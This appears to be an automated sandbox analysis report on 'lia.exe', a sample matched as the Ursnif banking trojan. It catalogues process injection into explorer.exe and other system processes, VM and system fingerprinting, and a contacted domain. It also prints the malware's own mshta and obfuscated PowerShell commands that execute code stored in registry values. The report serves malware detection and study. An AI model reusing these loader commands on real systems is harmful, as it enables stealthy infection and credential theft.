Source: RuntimeBroker.exe, 00000024.00000000.640630745.0000021910A2A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: mshta.exe, 0000000B.00000003.423217219.000002480E9FE000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\lia.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_036D2ECF

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress, 1_2_004012E6
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039D16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_039D16AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036B16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 44_2_036B16AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\lia.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\lia.exe Memory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: A90000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 215F44A0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3300000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Writes to foreign memory regions
Source: C:\Users\user\Desktop\lia.exe Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0
Source: C:\Users\user\Desktop\lia.exe Memory written: C:\Windows\System32\control.exe base: 5D0000
Source: C:\Users\user\Desktop\lia.exe Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5EA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 850000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 5E8000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: A90000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF4000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A650000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F3A000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: D9724C4000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5EA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 850000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 5E8000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: A90000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\lia.exe Thread register set: target process: 6004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 5360
Source: C:\Windows\explorer.exe Thread register set: target process: 3092
Source: C:\Windows\explorer.exe Thread register set: target process: 4252
Source: C:\Windows\explorer.exe Thread register set: target process: 4572
Source: C:\Windows\explorer.exe Thread register set: target process: 5160
Source: C:\Windows\explorer.exe Thread register set: target process: 5652
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\lia.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.493442735.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.558340773.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.517558095.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.507991039.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.533591545.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491157547.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.521122130.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527432058.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.543730981.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495158244.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\Desktop\lia.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_00401AFE
Queries the installation date of Windows
Source: C:\Users\user\Desktop\lia.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number, etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B142A6 cpuid 1_2_00B142A6
Source: C:\Users\user\Desktop\lia.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_00401C44
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B142A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_00B142A6
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EC557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_039EC557
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
